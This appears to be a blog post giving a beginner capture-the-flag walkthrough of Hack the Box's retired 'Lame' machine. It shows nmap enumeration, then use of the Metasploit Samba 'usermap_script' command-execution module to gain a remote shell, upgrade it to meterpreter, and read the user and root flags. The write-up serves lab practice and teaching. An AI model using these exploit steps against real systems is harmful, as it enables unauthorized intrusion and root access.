Hello friends!! Today we are going to solve another CTF challenge
“Lame” which is lab presented by Hack
the Box for making online penetration practices according
to your experience level. They have collection of vulnerable labs as challenges
from beginners to Expert level. HTB have two partitions of lab i.e. Active and
retired since we can’t submit write up of any Active lab therefore we have
chosen retried Lame lab.
Level: Beginners
Task: find user.txt and root.txt file in victim’s machine.
Let’s
begin the Game!!
Since these labs are online available therefore they have static
IP and IP of Lame is 10.10.10.3 so let’s begin with
nmap port enumeration.
nmap -sV 10.10.10.3
From given below image, you can observe that we found so many open
ports such as 21 for ftp, 22 for ssh, 139 and 445 for samba service and also
got hit OS platform can be Unix or linux.
Gratefully Google gave me hint in their 2nd link
of exploit DB.
Then I run msfconsole
command in terminal and load metasploit framework for using Samba 3.0.20 <
3.0.25rc3 - 'Username' map script' Command Execution module for exploiting
target machine.
use
exploit/multi/samba/usermap_script
msf
exploit(multi/samba/usermap_script) > set rhost 10.10.10.3
msf
exploit(multi/samba/usermap_script) > exploit
Terrific!! I
have got unauthorized access of victims command shell through session 1 as shown in below image.
I had updated command shell into meterpreter shell by
executing following command.
session -u 1
Inside path: /home/makis
I found user.txt file and used cat
“file name” command for reading this file.
cd home
ls
cd makis
ls
cat user.txt
Great!! We got
our 1st flag successfully
Inside path: /root
I found root.txt file and used cat
“file name” command for reading this file.
cd root
ls
cat root.txt
Great!! We got
our 2st flag successfully
It will be very stress-free challenge for those candidate
who have knowledge little know vulnerability analysis.
Happy Hacking!!
0 comments:
Post a Comment